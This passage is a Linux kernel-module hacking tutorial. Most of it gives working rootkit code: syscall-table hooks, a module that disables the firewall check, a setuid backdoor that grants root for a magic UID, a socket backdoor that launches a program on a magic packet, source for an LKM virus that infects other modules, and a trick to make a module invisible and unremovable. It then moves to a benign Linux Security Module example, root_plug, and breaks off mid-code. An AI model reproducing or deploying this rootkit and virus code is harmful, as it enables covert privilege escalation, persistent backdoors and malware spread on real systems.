    There are several ways to make our kernel space data acceptable to a systemcall. A very easy way (the best way, in my opinion) is playing with the needed registers. Linux uses segment selectors to differentiate between kernel space and user space. Arguments of systemcalls that were issued from user space lie somewhere in the range of the user data segment, which the kernel addresses through FS. The kernel data segment selector (DS) can be retrieved by using get_ds() from asm/segment.h. So data in kernel space can be used as systemcall parameters only if we set the segment selector that the kernel uses for the user segment to that DS value. This can be done by using set_fs(...). But we have to restore FS after the systemcall has accessed its arguments.


    Here are some kernel space functions


    Some functions, such as printk(...), can be used by everyone in kernel space; they are also called kernel functions. These functions are made for kernel developers who need complex functions that are normally available only through library functions. Ex: - suser() fsuser() /* for checking for superuser rights */

    Here is an example showing the above scenario.

    The filename is in our kernel space; a string we just created, for example

    unsigned long old_fs_value=get_fs();
    
    set_fs(get_ds());             /*after this the systemcall accepts kernel space data*/
    open(filename, O_CREAT|O_RDWR|O_EXCL, 0640);
    set_fs(old_fs_value);         /*restore fs...*/
    


    This is the fastest way of solving the problem. The functions which are showed still now (brk, open) are all implemented through a single systemcall. But there are also groups of user space functions which are summarized into one systemcall. Example - sys_socketcall. It implements every function concerning sockets (creation, closing, sending, receiving,...).
    In certain situations it can be very interesting to redirect the execution of a file, for example /bin/login or tcpd. The same mechanism allows us to insert a new systemcall into the running kernel. We used the following code:

    extern void* sys_call_table[]; 
    /*must be defined because of syscall macro used below*/ 
    
    /* creating error representative integer */
    int errno; 
    
    /*we define our own systemcall*/ 
    int __NR_myexecve; 
    
    /*we must use brk*/ 
    static inline _syscall1(int, brk, void *, end_data_segment); 
    
    int (*orig_execve) (const char *, const char *[], const char *[]);
    
     /*here user -> kernel space transition specialized for strings is better than memcpy_fromfs(...)*/ 
    
    char *strncpy_fromfs(char *dest, const char *src, int n) 
    { 
    	char *tmp = src; 
    	int compt = 0; 
    	do { 
    		dest[compt++] = __get_user(tmp++, 1); 
    	} while ((dest[compt - 1] != '\0') && (compt != n));
    	 return dest;
     } 
    
    


    /*this is something like a systemcall macro called with SYS_execve, the asm code calls int 0x80 with the registers set in a way needed for our own __NR_myexecve systemcall*/

    int my_execve(const char *filename, const char *argv[], const char *envp[]) {
        long __res; 
    __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_myexecve), "b"((long) 
    	(filename)), "c"((long) (argv)), 	"d"((long) (envp)));
        return (int) __res;
     } 
    
    int init_module(void) /*module setup*/
    {
    	/*the following lines choose the systemcall number of our new myexecve*/
    	__NR_myexecve = 200;
    	while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
    		__NR_myexecve--;

    	orig_execve = sys_call_table[SYS_execve];

    	if (__NR_myexecve != 0) {
    		sys_call_table[__NR_myexecve] = orig_execve;
    		sys_call_table[SYS_execve] = (void *) hacked_execve;
    	}
    	return 0;
    }
    
    void cleanup_module(void)            /*module shutdown*/
    {
    	sys_call_table[SYS_execve]=orig_execve;                                   
    }
    
    	


    In the above program we have wrapped the existing systemcall SYS_execve so that it can be customized according to our needs (the replacement function hacked_execve itself is not shown). Moreover, the new systemcall can be loaded and unloaded on demand through the module setup and module shutdown procedures in the program. As long as the module is not loaded, the original systemcall is used.



4.2 Kernel Module in Exploit

    Now we start abusing the LKM (or KLM) scheme. Normally LKMs are used to extend the kernel (especially with hardware drivers). The modules in this section do something different: they intercept systemcalls and modify them in order to change the way the system reacts to certain commands. The following modules change the OS version information that is reported and disable the create-directory command. They are only small demonstrations of the approach we follow.

    Example 1: Changing the OS version information: (for command 'uname -a')


    extern void* sys_call_table[];       /*sys_call_table is exported, so we
                                        can access it*/     
    int (*orig_utsname)(struct old_utsname *name);
    static char *os_label;
    MODULE_PARM(os_label, "s");
    static int uname_h(struct old_utsname *name) {
     int res;
     res = (*orig_utsname)(name);
     if(res < 0) {  return(-EFAULT);  }
     copy_to_user(name->sysname, os_label, sizeof(name->sysname));
     copy_to_user(name->nodename, os_label, sizeof(name->sysname));
     copy_to_user(name->machine, os_label, sizeof(name->sysname));
     copy_to_user(name->release, os_label, sizeof(name->sysname));
      return(0);
    }
    int init_module(void) {
     orig_utsname = sys_call_table[SYS_uname];
     sys_call_table[SYS_uname] = uname_h;
     return(0);
    }
    void cleanup_module(void) {
     sys_call_table[SYS_uname] = orig_utsname;
     return;
    }

    It should be compiled with
    # gcc -c -O3 filename.c
    and then installed with
    # insmod filename.o os_label="koushik"


    Example 2: Changing the mkdir system call (and with it the mkdir command):

    #define MODULE
    #define __KERNEL__
    #include "linux/module.h"
    #include "linux/kernel.h"
    #include "asm/unistd.h"
    #include "sys/syscall.h"
    #include "sys/types.h"
    #include "asm/fcntl.h"
    #include "asm/errno.h"
    #include "linux/types.h"
    #include "linux/dirent.h"
    #include "sys/mman.h"
    #include "linux/string.h"
    #include "linux/fs.h"
    #include "linux/malloc.h"
    
    
    extern void* sys_call_table[];       /*sys_call_table is exported, so we
                                        can access it*/               
    
    int (*orig_mkdir)(const char *path); /*the original systemcall*/
    
    
    int hacked_mkdir(const char *path)
    {
    return 0;                           /*everything is ok, but the new systemcall
                                        does nothing*/
    }
    
    int init_module(void)                /*module setup*/
    {
    orig_mkdir=sys_call_table[SYS_mkdir];
    sys_call_table[SYS_mkdir]=hacked_mkdir;
    return 0;
    }
    
    void cleanup_module(void)            /*module shutdown*/
    {
    sys_call_table[SYS_mkdir]=orig_mkdir; /*set mkdir syscall to the original
                                          one*/
    }


    After compiling and installing this module, try to make a directory: it will not work. Because the call returns 0 (standing for OK), we do not get an error message. After the module is removed, making directories is possible again. As we can see, we only need to change the corresponding entry in sys_call_table to intercept a kernel systemcall.



    The general approach to intercepting a systemcall is outlined in the following list:

    · find the systemcall entry in sys_call_table[] (the numbers are listed in include/sys/syscall.h)

    · save the old entry of sys_call_table[X] in a function pointer (where X stands for the number of the systemcall we want to intercept)

    · install the new (hacked) systemcall by setting sys_call_table[X] to the address of the function we defined

    We can conclude that it is very useful to save the old systemcall function pointer, because we will need it in our hacked one for emulating the original call.
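
    The save, replace and restore steps listed above amount to ordinary function pointer bookkeeping. The following user space sketch shows that bookkeeping on a small private table; it does not touch the kernel, and every demo_* name is hypothetical.

```c
#include <stddef.h>

typedef int (*demo_handler_t)(int);

enum { DEMO_NR_DOUBLE = 0, DEMO_NR_COUNT = 1 };

/* The "original" handler stored in the table. */
static int demo_double(int x) { return 2 * x; }

/* A private dispatch table standing in for a table of handlers. */
static demo_handler_t demo_table[DEMO_NR_COUNT] = { demo_double };

/* Saved pointer to the original handler, needed to emulate it later. */
static demo_handler_t demo_saved = NULL;

/* Replacement handler: calls the original through the saved pointer. */
static int demo_wrapped_double(int x)
{
    return demo_saved(x) + 1;
}

void demo_install(void)
{
    demo_saved = demo_table[DEMO_NR_DOUBLE];        /* save the old entry */
    demo_table[DEMO_NR_DOUBLE] = demo_wrapped_double; /* install the new one */
}

void demo_remove(void)
{
    if (demo_saved != NULL) {
        demo_table[DEMO_NR_DOUBLE] = demo_saved;    /* restore the old entry */
        demo_saved = NULL;
    }
}

int demo_call(int nr, int arg)
{
    return demo_table[nr](arg);
}
```

    Without the saved pointer the replacement could neither reproduce the original behaviour nor be undone, which is the point made in the paragraph above.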

    Interesting Syscalls to Intercept


    It is practically impossible to know every systemcall behind every user space function that an application or command can use. Here are some hints for finding systemcalls worth taking control of.

    · Read the source code. On systems like Linux we can get the source code of nearly any program a user (admin) can run. There we can find basic functions like dup, open, write, etc.

    · Look at include/sys/syscall.h and try to find a directly corresponding systemcall (dup -> SYS_dup; write -> SYS_write; ...).

    · Remember that some calls, like socket, send, receive, ..., are implemented through one systemcall.

    Finding interesting systemcalls (the strace approach)


    If we issue the command '# strace whoami', we get a listing of every systemcall made by the 'whoami' command during execution. In that listing there are 4 interesting systemcalls to intercept in order to manipulate the output of 'whoami':

    geteuid() = 500
    getuid() = 500
    getgid() = 100
    getegid() = 100
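
    The same four values can be read from an ordinary program with the standard POSIX calls. The sketch below is a plain user space example; the demo_ids structure and the two helper functions are hypothetical names introduced only for illustration.

```c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* The four identity values that appear in the strace listing. */
struct demo_ids {
    uid_t uid;
    uid_t euid;
    gid_t gid;
    gid_t egid;
};

/* Collect real and effective user and group IDs of the calling process. */
struct demo_ids demo_read_ids(void)
{
    struct demo_ids ids;

    ids.uid  = getuid();
    ids.euid = geteuid();
    ids.gid  = getgid();
    ids.egid = getegid();
    return ids;
}

/* Print the values in the same "call() = value" layout strace uses. */
void demo_print_ids(const struct demo_ids *ids)
{
    printf("geteuid() = %ld\n", (long)ids->euid);
    printf("getuid() = %ld\n", (long)ids->uid);
    printf("getgid() = %ld\n", (long)ids->gid);
    printf("getegid() = %ld\n", (long)ids->egid);
}
```

    Any program that reports the user's identity depends on these calls, which is why they stand out in the strace output.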


    Confusing the kernel's System Table


    To access sys_call_table we rely on the kernel symbol table. sys_call_table holds pointers to all the systemcall functions, which we can modify, and in the same way our module can access any other exported item (functions, structures, variables, for example). Anything listed in /proc/ksyms can be corrupted.
    Here is a view of /proc/ksyms:

    001bf1dc ppp_register_compressor
    ......
    
    00139318 call_in_firewall
    0013935c call_out_firewall
    .......
    

    We can target the function "call_in_firewall", which the kernel uses for firewall management. We now replace this function with a bogus one. Here is the exploit program:

    #define MODULE
    #define __KERNEL__
    
    #include "linux/module.h"
    #include "linux/kernel.h"
    #include "asm/unistd.h"
    #include "sys/syscall.h"
    #include "sys/types.h"
    #include "asm/fcntl.h"
    #include "asm/errno.h"
    #include "linux/types.h"
    #include "linux/dirent.h"
    #include "sys/mman.h"
    #include "linux/string.h"
    #include "linux/fs.h"
    #include "linux/malloc.h"
    
    /*get the exported function*/
    extern int *call_in_firewall;
    
    /*our nonsense call_in_firewall*/
    int new_call_in_firewall(){
    	return 0;
    }
    int init_module(void)                /*module setup*/
    {
    	call_in_firewall=new_call_in_firewall;
    	return 0;
    }
    
    void cleanup_module(void)            /*module shutdown*/
    {
    	return 0;
    }
    		
    



    After compiling and loading this LKM, do an 'ipfwadm -I -a deny' and then a 'ping 127.0.0.1'. The kernel will produce a nice error message, because the call_in_firewall(...) function it calls was replaced by a bogus one.

    This is a quite brutal way of killing an exported symbol. We could also disassemble (using gdb) a certain symbol and modify certain bytes which will change the working of that symbol.

    Hacks of this kind are not only systemcall related; they also matter for general permission problems. In the next module, whenever setuid is called with a certain magic UID, the module sets the UIDs to 0 (SuperUser). For example, a user who logged on with uid = 500 ends up with uid 0 (like the superuser).

    Here is the implementation (only the hacked_setuid systemcall is shown):

    int hacked_setuid(uid_t uid) {
       int tmp;
       
       /*do we have the magic UID (defined in the LKM somewhere before*/
       if (uid == MAGICUID) {
       /*if so set all UIDs to 0 (SuperUser)*/
    current->uid = 0;
    current->euid = 0;
    current->gid = 0;
    current->egid = 0;
    return 0;
       }
       tmp = (*o_setuid) (uid);
       return tmp;
    }
    
    
    



    Network (Socket) related Hacks

    The network is the hacker's playground, so there are many things we can do by controlling socket operations. Here we use a nice backdoor: we just intercept the sys_socketcall systemcall and wait for a packet with a certain length and certain contents.

    Here is the implementation of the hacked systemcall (The main function )

    int hacked_socketcall(int call, unsigned long *args)
    {
    int ret, ret2, compt;
    
    /*our magic size*/
    int MAGICSIZE=42;
    
    /*our magic contents*/
    char *t = "packet_contents";
    unsigned long *sargs = args;
    unsigned long a0, a1, mmm;
    void *buf;
    
    /*do the call*/
    ret = (*o_socketcall) (call, args);
    
    /*did we have magicsize & and a recieve ?*/
     if (ret == MAGICSIZE && call == SYS_RECVFROM) 
     {
      /*work on arguments*/
      a0 = get_user(sargs);
      a1 = get_user(sargs + 1);
      buf = kmalloc(ret, GFP_KERNEL);
      memcpy_fromfs(buf, (void *) a1, ret);
      for (compt = 0; compt < ret; compt++)
       if (((char *) (buf))[compt] == 0)
        ((char *) (buf))[compt] = 1;
       /*do we have magic_contents ?*/
       if (strstr(buf, mtroj)) 
       {
        kfree(buf);
        ret2 = fork();
       if (ret2 == 0) 
       {
        /*if so execute our proggy (shell or whatever you want...) */
        mmm = current->mm->brk;
        ret2 = brk((void *) (mmm + 256));
        memcpy_tofs((void *) mmm + 2, (void *) t, strlen(t) + 1);
    
        /*plaguez's execve implementation -> see 4.2*/
        ret2 = my_execve((char *) mmm + 2, NULL, NULL);
       }
      }
     }
    return ret;
    }
    




    The code intercepts every sys_socketcall (which is responsible for everything concerning socket operations). Inside the hacked systemcall the code first issues the normal systemcall. After that, the return value and the call variable are checked. If it was a receive socketcall and the 'packet size' (which has nothing to do with TCP/IP packets) is right, the code checks the contents that were received. If it finds the magic contents, the code can be sure that we (the hacker) want to start the backdoor program. This is done by my_execve(...). This approach is very good; it would also be possible to wait for a special connect / close pattern, just be creative. But we have to remember that the methods mentioned above need a service listening on a certain port, because the receive function is only issued by daemons receiving data from an established connection. This is a disadvantage, because it could look suspicious to some paranoid admins out there.


    Virus writing with LKMs

    This is not the hacking part; this part covers virus coding using the concept of kernel modules. The kernel module described here requires a Linux system with kerneld installed.
    First of all, we have to know that an LKM infector does not infect normal ELF executables; it only infects modules, which are loaded and unloaded. This loading / unloading is often managed by kerneld. So if a module is infected with the virus code, loading it also loads the virus LKM, which uses self-hiding features. The virus module intercepts the sys_create_module and sys_delete_module systemcalls for further infection.
    Whenever a module is unloaded on that system, it is infected by the new sys_delete_module systemcall. So every module requested by kerneld (or manually) will be infected when unloaded.
    We can imagine the following scenario for the first infection:

    · the admin is searching for a network driver for his new interface card (ethernet, ...).

    · he starts searching the web.

    · he finds a driver module which should work on his system and downloads it.

    · he installs the module on his system [the module is infected]

    --> the infector is installed, the system is compromised


    Of course, he did not download the source; he was lazy and took the risk of using a binary file. So admins should never trust binary files (especially modules). With the chances / risks of LKM infectors in mind, let us look a bit closer at the LKM infector by SVAT. Imagine we have the source for the virus LKM (a simple module which intercepts sys_create_module / sys_delete_module and does some other, more tricky, things). The first question is how to infect an existing module (the host module). Let us do some experimenting. Take two modules and 'cat' them together like this:


    # cat module1.o >> module2.o
    After this try to insmod the resulting module2.o (which also includes module1.o at its end).
    # insmod module2.o
    Ok it worked, now check which modules are loaded on your system
    # lsmod
    Module Pages Used by
    module2 1 0


    So we know that when two modules are concatenated, the first one (in terms of object code) is loaded and the second one is ignored. There is also no error saying that insmod cannot load corrupted code. With this in mind, it should be clear that a host module could be infected by

    cat host_module.o >> virus_module.o
    ren virus_module.o host_module.o


    This way loading host_module.o will load the virus with all its LKM features. But there is one problem: how do we load the actual host module? It would seem very strange to a user / admin if his device driver did nothing. Here we need the help of kerneld. As I said in I.7, kerneld can be used to load a module: just use request_module("module_name") in the sources. This forces kerneld to load the specified module. But where do we get the original host module from? It is packed in host_module.o (together with virus_module.o). So after compiling virus_module.c to object code, we have to look at its size in bytes. After this we know where the original host_module.o begins in the packed file (the virus module must be compiled twice: the first time to check the object code size, the second time with that size hardcoded in the source). After these steps the virus module should be able to extract the original host_module.o from the packed one. The extracted module has to be saved somewhere and loaded via request_module("orig_host_module.o"). After loading the original host_module.o, the virus module (which was itself loaded by the insmod issued by the user or by kerneld) can start infecting any loaded modules.


    Stealthf0rk (SVAT) used the sys_delete_module(...) systemcall for doing the infection, so let's take a look at his hacked systemcall (I only added some comments) :

    /*just the hacked systemcall*/
    int new_delete_module(char *modname)
    {
    /*number of infected modules*/
    static int infected = 0;
    int retval = 0, i = 0;
    char *s = NULL, *name = NULL;
    
    /*call the original sys_delete_module*/       
    retval = old_delete_module(modname); 
    
     if ((name = (char*)vmalloc(MAXPATH + 60 + 2)) == NULL)
     return retval;
    
    
    
    
    /*check files to infect -> this comes from hacked sys_create_module; just
    a feature of *this* LKM infector, nothing generic for this type of virus*/
    for (i = 0; files2infect[i][0] && i < 7; i++) 
    {
     strcat(files2infect[i], ".o"); 
     if ((s  = get_mod_name(files2infect[i])) == NULL) 
     {
      return retval;
     }
     name = strcpy(name, s);
     if (!is_infected(name)) 
     {
      /*this is just a macro wrapper for printk(...)*/
      DPRINTK("try 2 infect %s as #%d\n", name, i);
      /*increase infection counter*/
      infected++;
      /*the infect function*/
      infectfile(name);
     }
     memset(files2infect[i], 0, 60 + 2);
    } /* for */
    /* its enough */
    /*how many modules were infected, if enough then stop and quit*/
    if (infected >= ENOUGH)
     cleanup_module();
    vfree(name);
    return retval;
    }
    Well, there is only one interesting function in this systemcall: infectfile(...).
    So let's examine that function (again, I only added some comments):
    int infectfile(char *filename)
    {
    char *tmp = "/tmp/t000";
    int in = 0, out = 0;
    struct file *file1, *file2;
    
    /* this is a macro define by the virus. It does the
    kernel space -> user space handling for systemcall arguments(see I.4)*/
    BEGIN_KMEM
    /*open objectfile of the module which was unloaded*/
    in = open(filename, O_RDONLY, 0640);
    /*create a temp. file*/
    out = open(tmp, O_RDWR|O_TRUNC|O_CREAT, 0640);
    /*see BEGIN_KMEM*/
    END_KMEM
    
    DPRINTK("in infectfile: in = %d out = %d\n", in, out);
    if (in <= 0 || out <= 0)
     return -1;
    file1 = current->files->fd[in];
    file2 = current->files->fd[out];
    if (!file1 || !file2)
     return -1;
    
    /*copy module objectcode (host) to file2*/
    cp(file1, file2);
    BEGIN_KMEM
    file1->f_pos = 0;
    file2->f_pos = 0;
    /* write Vircode [from mem] */
    DPRINTK("in infetcfile: filenanme = %s\n", filename);
    file1->f_op->write(file1->f_inode, file1, VirCode, MODLEN);
    cp(file2, file1);
    close(in);
    close(out);
    unlink(tmp);
    END_KMEM
    return 0;
    }  



    I think the infection function should be quite clear. There is only one thing left which I think is necessary to discuss: how does the infected module first start the virus and load the original module (we know the theory, but how is it done in reality)? To answer this question, let us take a look at a function called load_real_mod(char *path_name, char *name), which manages that problem:


    /* Is that simple: we disinfect the module [hide 'n seek]
    * and send a request to kerneld to load
    * the orig mod. N0 fuckin' parsing for symbols and headers
    * is needed - cool.
    */
    int load_real_mod(char *path_name, char *name)
    {    
    int r = 0, i = 0;  
    struct file *file1, *file2;
    int in =  0, out = 0; 
    
    DPRINTK("in load_real_mod name = %s\n", path_name);
    if (VirCode)
     vfree(VirCode);
    VirCode = vmalloc(MODLEN);
    if (!VirCode)
      return -1;
    BEGIN_KMEM
    /*open the module just loaded (->the one which is already infected)*/
    in = open(path_name, O_RDONLY, 0640);
    END_KMEM
    if (in <= 0)
     return -1;
    file1 = current->files->fd[in];
    if (!file1)
     return -1;
    /* read Vircode [into mem] */
    BEGIN_KMEM
    file1->f_op->read(file1->f_inode, file1, VirCode, MODLEN);
    close(in);
    END_KMEM
    /*split virus / orig. module*/
    disinfect(path_name);
    /*load the orig. module with kerneld*/
    r = request_module(name);
    DPRINTK("in load_real_mod: request_module = %d\n", r);
    return 0;
    }    
    



    It should now be clear *why* this LKM infector needs kerneld: the original module is loaded by requesting it with request_module(...). This concludes our very basic journey through the world of LKM infectors (viruses). The next subsections show some basic extensions / ideas concerning LKM infectors.


Making our LKM invisible & unremovable



    Now it is time to talk about the most important / interesting hack I will present. The idea comes from plaguez's LKM published in Phrack (other people, like Solar Designer, discussed it before).
    So far we are able to hide files, processes, directories, and whatever else we want. But we cannot hide our own LKM: just load an LKM and take a look at /proc/modules. There are several ways to solve this problem. The first solution could be partial file hiding (see II.4.3). This would be easy to implement, but there is a better, more advanced and more secure way. Using this technique we must also intercept the sys_query_module(...) systemcall. An example of this approach can be seen in A-b.
    As I explained in I.1, a module is finally loaded by issuing an init_module(...) systemcall, which starts the module's init function. init_module(...) gets an argument: struct mod_routines *routines. This structure contains very important information for loading the LKM. We can manipulate some data in this structure so that our module has no name and no references. After this the system no longer shows our LKM in /proc/modules, because it ignores LKMs with no name and a reference count equal to 0. The following lines show how to access the relevant part of mod_routines in order to hide the module.



    /*from Phrack & AFHRM*/
    int init_module()
    {
     register struct module *mp asm("%ebp");   // or whatever register it is in
     *(char*)mp->name=0;
     mp->size=0;
     mp->ref=0;
    


    This code relies on the fact that gcc did not modify the ebp register, because we need it to find the right memory location. After finding the structure we can set its name and reference members to 0, which makes our module invisible and also unremovable: only LKMs that the kernel knows about can be removed, and our module is unknown to the kernel. Remember that this trick only works if gcc is used in a way that does not touch the register we need for reaching the structure.

    We must use the following gcc options :

    #gcc -c -O3 -fomit-frame-pointer module.c

    · -fomit-frame-pointer tells gcc not to keep the frame pointer in a register for functions that don't need one. This keeps our register clean after the function call of init_module(...), so that we can access the structure. In my opinion this is the most important trick, because it helps us to develop hidden LKMs which are also unremovable.




4.2.2 Introduction of Linux Security Module Project

    Over time it was realised that a general access-control framework for the Linux kernel was needed. Such a framework would allow different security models to work without modifying the main kernel code. At the 2001 Linux Kernel Summit, NSA developers presented their work on Security-Enhanced Linux (SELinux) and emphasized the need for enhanced security support in the main Linux kernel. Out of this grew the Linux Security Module (LSM) project.

    A number of developers worked together to create a framework of kernel hooks that would allow many security models to work as loadable kernel modules. The first portions of the LSM framework appeared in the 2.5.29 kernel release. Further kernel releases contained more portions of the LSM framework, and hopefully the entire patch is included in the 2.6.0 kernel release (which, incidentally, was released just a few days ago).

    This is a brief overview of how to create a simple kernel module that uses the LSM framework, rather than a discussion of how the LSM framework works or of the design decisions that were made in creating it.


    Root Plug


    Let us use the 2.5.31 kernel release, which contains enough of the LSM interface for us to create a useful module. Suppose that in our module we want to prevent any program with the group ID of 0 (root) from running if a specific USB device is not plugged in to the machine at that moment. This gives us a simple way of preventing root exploits from running on our machine, and of preventing new users from logging in when we are not present.


    To this end, let us create a kernel module called root_plug.

    Armed with the knowledge of how UNIX systems handle user and group ID values, and of how these interact with the setuid class of system calls, we develop a module based on the LSM interface.

    The LSM interface is four simple functions:

    
    int register_security
        (struct security_operations *ops);
    int unregister_security 
        (struct security_operations *ops);
    
    int mod_reg_security (const char *name, 
                      struct security_operations *ops);
    int mod_unreg_security  (const char *name, 
                      struct security_operations *ops);
    


    A security module registers a set of security_operations function callbacks with the kernel by calling the function register_security(). If that fails, it means that some other security module probably has been loaded already, so the mod_reg_security() function is called in an attempt to register with this security module. This can be seen in the following code:

    /* register ourselves with the security framework */
    
    if (register_security (&rootplug_security_ops)) {
       printk (KERN_INFO 
           "Failure registering Root Plug module "
           "with the kernel\n");
       /* try registering with primary module */
       
       if (mod_reg_security (MY_NAME, 
                             &rootplug_security_ops)) {
           printk (KERN_INFO "Failure registering "
                   "Root Plug module with primary "
                   "security module.\n");
           return -EINVAL;
       }
       secondary = 1;
    }


    When the module wants to unload itself, the reverse process must happen. If we used mod_reg_security() to register ourselves, the mod_unreg_security() function should be called, otherwise the unregister_security() function is the proper thing to call. The following code shows this logic:

    /* remove ourselves from the security framework */
    
    if (secondary) {
       if (mod_unreg_security (MY_NAME, 
                               &rootplug_security_ops))
          printk (KERN_INFO 
                  "Failure unregistering Root Plug "
                  "module with primary module.\n");
    } else { 
       if (unregister_security (
           &rootplug_security_ops)) {
          printk (KERN_INFO "Failure unregistering "
                  "Root Plug module with the kernel\n");
       }
    }
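
    The register-or-fall-back logic and its mirror image on unload can be exercised in user space with a toy model. The sketch below is only an illustration under stated assumptions: the demo_* names are hypothetical, and the rule that the primary module accepts at most one stacked module is an assumption of this model, not a statement about the kernel.

```c
#include <errno.h>
#include <stddef.h>

struct demo_ops { const char *name; };

static struct demo_ops *demo_primary = NULL;  /* the single primary slot */
static struct demo_ops *demo_stacked = NULL;  /* one module stacked on it */

/* Stand-in for register_security(): fails if a primary is already set. */
int demo_register(struct demo_ops *ops)
{
    if (demo_primary != NULL)
        return -EINVAL;
    demo_primary = ops;
    return 0;
}

/* Stand-in for mod_reg_security(): needs a primary with a free slot. */
int demo_mod_reg(struct demo_ops *ops)
{
    if (demo_primary == NULL || demo_stacked != NULL)
        return -EINVAL;
    demo_stacked = ops;
    return 0;
}

int demo_unregister(struct demo_ops *ops)
{
    if (demo_primary != ops)
        return -EINVAL;
    demo_primary = NULL;
    return 0;
}

int demo_mod_unreg(struct demo_ops *ops)
{
    if (demo_stacked != ops)
        return -EINVAL;
    demo_stacked = NULL;
    return 0;
}

/* Load path: try primary registration first, then fall back to stacking. */
int demo_load(struct demo_ops *ops, int *secondary)
{
    *secondary = 0;
    if (demo_register(ops) == 0)
        return 0;
    if (demo_mod_reg(ops) != 0)
        return -EINVAL;
    *secondary = 1;
    return 0;
}

/* Unload path: undo whichever registration succeeded at load time. */
int demo_unload(struct demo_ops *ops, int secondary)
{
    return secondary ? demo_mod_unreg(ops) : demo_unregister(ops);
}
```

    The secondary flag is the only state the module has to remember between loading and unloading, exactly as in the two code fragments above.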


    The rootplug_security_ops is a large structure of function pointers that are called when various events happen in the kernel, for example whenever an inode is accessed, a module is loaded or a task is created. As of the 2.5.31 kernel, there were 88 different function pointers needed. The majority of these functions are not needed by most security models, but they must be implemented, or the kernel will not work properly. If a security module does not need to do anything for a specific hook, a "good" value needs to be returned to the kernel. An example of this can be seen in the following function:



    static int rootplug_file_permission
        (struct file *file, int mask)
    {     return 0; }
    


    This function is called whenever the kernel wants to determine if a specific file can be accessed at this moment in time. A security module can look at the file, check whether the current user has proper authority and possibly refuse to grant it.
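
    The difference between a hook that simply returns a "good" value and one that enforces a policy can be shown with a small user space model. The sketch below is an illustration only: the demo_* types, the DEMO_MAY_WRITE bit and the helper that fills unset hooks with permissive defaults are all hypothetical, and the helper is a convenience of this model rather than something the text attributes to the 2.5.31 kernel.

```c
#include <errno.h>
#include <stddef.h>

#define DEMO_MAY_WRITE 2   /* hypothetical permission bit */

struct demo_file { const char *path; };

/* A tiny table of hooks, standing in for the much larger real structure. */
struct demo_hooks {
    int (*file_permission)(const struct demo_file *file, int mask);
    int (*task_create)(unsigned long clone_flags);
};

/* Permissive defaults: always return the "good" value 0. */
static int demo_allow_file_permission(const struct demo_file *file, int mask)
{
    (void)file;
    (void)mask;
    return 0;
}

static int demo_allow_task_create(unsigned long clone_flags)
{
    (void)clone_flags;
    return 0;
}

/* A hook with an actual policy: refuse any access that asks to write. */
int demo_deny_write(const struct demo_file *file, int mask)
{
    (void)file;
    return (mask & DEMO_MAY_WRITE) ? -EACCES : 0;
}

/* Give every hook the module left unset a permissive default. */
void demo_fill_defaults(struct demo_hooks *hooks)
{
    if (hooks->file_permission == NULL)
        hooks->file_permission = demo_allow_file_permission;
    if (hooks->task_create == NULL)
        hooks->task_create = demo_allow_task_create;
}
```

    A caller never has to test a hook for NULL once the table is complete, which is the practical reason every entry must be implemented.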

    Description of The Sample module
    In this example module, we want to stop a new program from being run if a specific device, here a USB device, is not present.
    If that USB device is not present, the module prevents the program from running. This is done with the bprm_check_security hook. This function is called when the execve system call is made, right before the kernel tries to start up the task. If an error value is returned from this function, the task will not start. Here is our hook function:

    static int rootplug_bprm_check_security
        (struct linux_binprm *bprm)
    {
        if (bprm->e_gid == 0)
            if (find_usb_device() != 0)
                return -EPERM;
        return 0;
    }
    
    This function checks the value of the effective group ID at which the program is to be run. If it is zero, the function find_usb_device() is called. If the USB device is not found in the system, -EPERM is returned, which prevents the task from starting.
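
    The decision made by the hook depends on only two inputs: the effective group ID and whether the device is present. The following user space sketch spells out the resulting four cases. It is a model, not the module itself: the demo_* names are hypothetical, and a simple flag stands in for the real device search.

```c
#include <errno.h>

/* Only the field the check looks at is modelled here. */
struct demo_binprm { unsigned int e_gid; };

/* Hypothetical flag standing in for the result of the USB search. */
static int demo_device_present = 0;

void demo_set_device_present(int present)
{
    demo_device_present = present;
}

/* Same return convention as the text: 0 if found, -ENODEV otherwise. */
int demo_find_device(void)
{
    return demo_device_present ? 0 : -ENODEV;
}

/* Refuse to start a group-0 program unless the device is plugged in. */
int demo_bprm_check(const struct demo_binprm *bprm)
{
    if (bprm->e_gid == 0 && demo_find_device() != 0)
        return -EPERM;
    return 0;
}
```

    Programs with a non-zero effective group ID are never affected, so the device search is only paid for when a group-0 program is about to start.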


    Finding a USB Device

    The find_usb_device() function simply goes through all of the USB devices in the system and sees if the device specified by the user is present. The USB devices are kept in a tree, starting at the root hub device. The different root hubs are kept in a list of buses. These buses are checked in order in the find_usb_device() function:

    static int find_usb_device (void) {
        struct list_head *buslist;
        struct usb_bus *bus;
        int retval = -ENODEV;
    
        down (&usb_bus_list_lock);
        for (buslist = usb_bus_list.next;
             buslist != &usb_bus_list; 
             buslist = buslist->next) {
            bus = container_of (buslist, 
                                struct usb_bus, 
                                bus_list);
            retval = match_device(bus->root_hub);
            if (retval == 0)
                goto exit;
        }
    exit:
        up (&usb_bus_list_lock);
        return retval;
    }
    



    The match_device() function looks at the device passed to it. If it matches the expected device, then it returns success. Otherwise, it looks at the children of this device, calling itself recursively:

    static int match_device (struct usb_device *dev) {
       int retval = -ENODEV;
       int child;
       /* see if this device matches */
       if ((dev->descriptor.idVendor == vendor_id) &&
          (dev->descriptor.idProduct == product_id)) {
           /* we found the device! */
           retval = 0;
           goto exit;
       }
       /* look at all of the children of this device */
       for (child = 0; child < dev->maxchild; ++child) {
           if (dev->children[child]) {
               retval = 
                   match_device (dev->children[child]);
               if (retval == 0)
                   goto exit;
           }
       }
    exit:
       return retval;
    }
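
    The recursive search can be tried outside the kernel on a hand-built device tree. The sketch below is a user space model under stated assumptions: demo_usb_device is a hypothetical, much reduced stand-in for the kernel's device structure, and the IDs to look for are passed as parameters instead of being module variables.

```c
#include <errno.h>
#include <stddef.h>

#define DEMO_MAXCHILD 4

/* Reduced stand-in for a USB device node: IDs plus child pointers. */
struct demo_usb_device {
    unsigned short id_vendor;
    unsigned short id_product;
    int maxchild;                                   /* ports on this hub */
    struct demo_usb_device *children[DEMO_MAXCHILD];
};

/* Depth-first search: 0 if the device is in the tree, -ENODEV otherwise. */
int demo_match(const struct demo_usb_device *dev,
               unsigned short vendor, unsigned short product)
{
    int child;

    if (dev == NULL)
        return -ENODEV;

    /* see if this device matches */
    if (dev->id_vendor == vendor && dev->id_product == product)
        return 0;

    /* look at all of the children of this device */
    for (child = 0; child < dev->maxchild; ++child) {
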